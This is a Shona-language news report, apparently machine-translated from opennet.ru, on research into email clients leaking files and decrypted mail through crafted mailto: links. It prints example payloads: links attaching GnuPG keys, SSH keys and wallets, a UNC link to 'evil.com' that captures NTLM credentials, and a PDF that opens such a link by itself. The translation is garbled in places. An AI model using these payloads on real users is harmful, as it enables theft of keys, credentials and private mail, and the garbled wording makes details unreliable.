Vatsvakurudzi vanobva kuRuhr University Bochum (Germany) () maitiro evatengi vetsamba paunenge uchigadzira "mailto:" zvinongedzo zvine maparamendi epamberi. Vashanu vevashandisi veemail makumi maviri vakaongororwa vanga vari panjodzi yekurwiswa kwakanyengedza kutsiva zviwanikwa vachishandisa "batanidza" parameter. Vamwe vatanhatu veemail vatengi vaive panjodzi yePGP uye S/MIME kiyi yekutsiva kurwisa, uye vatengi vatatu vaive panjodzi yekurwiswa kuti vabvise zviri mukati memeseji yakavharidzirwa.
Links Β«"anoshandiswa kuita otomatiki kuvhurwa kwemutengi weemail kuti anyore tsamba kune anonyorerwa akatsanangurwa mune iyi link. Pamusoro pekero, unogona kudoma mamwe ma paramita sechikamu chekubatanidza, senge musoro wetsamba uye template yezvakajairwa zvemukati. Iko kurwiswa kwakarongwa kunoshandisa iyo "attach" parameter, iyo inokutendera kuti ubatanidze chinonamatira kune inogadzirwa meseji.
Vatengi vetsamba Thunderbird, GNOME Evolution (CVE-2020-11879), KDE KMail (CVE-2020-11880), IBM/HCL Notes (CVE-2020-4089) uye Pegasus Mail vaive panjodzi yekurwiswa kudiki kunokubvumira kuti uzvibatanidze wega. chero faira remunharaunda, rinotsanangurwa kuburikidza nekubatanidza se "mailto:?attach=path_to_file". Iyo faira inonamirwa pasina kuratidza yambiro, saka pasina kutarisisa kwakakosha, mushandisi anogona kusaona kuti tsamba ichatumirwa neyakanamatira.
Semuenzaniso, kushandisa chinongedzo senge "mailto:[email inodzivirirwa]&subject=Title&body=Text&attach=~/.gnupg/secring.gpg" unogona kuisa makiyi epachivande kubva kuGnuPG mutsamba. Iwe unogona zvakare kutumira zviri mukati me crypto wallets (~/.bitcoin/wallet.dat), SSH makiyi (~/.ssh/id_rsa) uye chero mafaera anowanikwa kumushandisi. Uyezve, Thunderbird inokutendera kuti ubatanidze mapoka emafaira nemasiki uchishandisa zvinovaka se "attach=/tmp/*.txt".
Pamusoro pemafaira emunharaunda, vamwe vatengi veemail vanogadzira zvinongedzo kunetiweki kuchengetedza uye nzira muIMAP server. Kunyanya, IBM Notes inobvumidza iwe kuendesa faira kubva kunetiweki dhairekitori paunenge uchigadzira zvinongedzo senge "attach=\\evil.com\dummyfile", pamwe nekubvuta NTLM yekusimbisa paramita nekutumira chinongedzo kune SMB server inodzorwa neanorwisa. (chikumbiro chinozotumirwa nemushandisi wazvino wekusimbisa paramita).
Thunderbird inobudirira kugadzirisa zvikumbiro se "attach=imap:///fetch>UID>/INBOX>1/", iyo inokutendera kuti ubatanidze zvirimo kubva kumaforodha paIMAP server. Panguva imwe cheteyo, mameseji anotorwa kubva kuIMAP, akavharidzirwa kuburikidza neOpenPGP uye S/MIME, anongocherwa otomatiki nemutengi wetsamba asati atumira. Vagadziri veThunderbird vaive nezve dambudziko muna February uye munyaya yacho dambudziko rakatogadziriswa (Thunderbird mapazi 52, 60 uye 68 anoramba ari panjodzi).
Shanduro dzekare dzeThunderbird dzaivewo panjodzi kune dzimwe mbiri dzakasiyana dzekurwiswa paPGP uye S/MIME zvakakurudzirwa nevaongorori. Kunyanya, Thunderbird, pamwe neOutLook, PostBox, eM Client, MailMate uye R2Mail2, yaive pasi pekurwiswa kwakakosha, zvichikonzerwa nekuti mutengi wetsamba anongopinza uye anoisa zvitupa zvitsva zvinotumirwa muS/MIME meseji, iyo inobvumira. anorwisa kuronga kutsiviwa kwemakiyi eruzhinji akatochengetwa nemushandisi.
Kurwiswa kwechipiri, uko Thunderbird, PostBox neMailMate inotapukira, inoshandura maficha emuchina wekuchengetedza mameseji uye inobvumira, uchishandisa mailto paramita, kutanga decryption yemameseji akavharidzirwa kana kuwedzera kwedhijitari siginecha yeanopokana meseji. kunotevera kutumira kwemhedzisiro kune anorwisa IMAP server. Mukurwiswa uku, ciphertext inofambiswa kuburikidza ne "muviri" paramende, uye "meta refresh" tag inoshandiswa kutangisa kufona kune anorwisa IMAP server. Semuyenzaniso: ' '
Kuti ugadzirise otomatiki "mailto:" zvinongedzo pasina kupindirana kwemushandisi, magwaro akagadzirwa ePDF anogona kushandiswa - iyo OpenAction chiito muPDF inokutendera iwe kuti uvhure otomatiki mailto inobata kana uchivhura gwaro:
%PDF-1.5
1 obj
<< /Type /Catalog /OpenAction [2 0 R] >>
endobj
2 obj
<< /Type /Action /S /URI/URI (mailto:?body=ββTANGA PGP MESSAGEββ[β¦])>>
endobj
Source: opennet.ru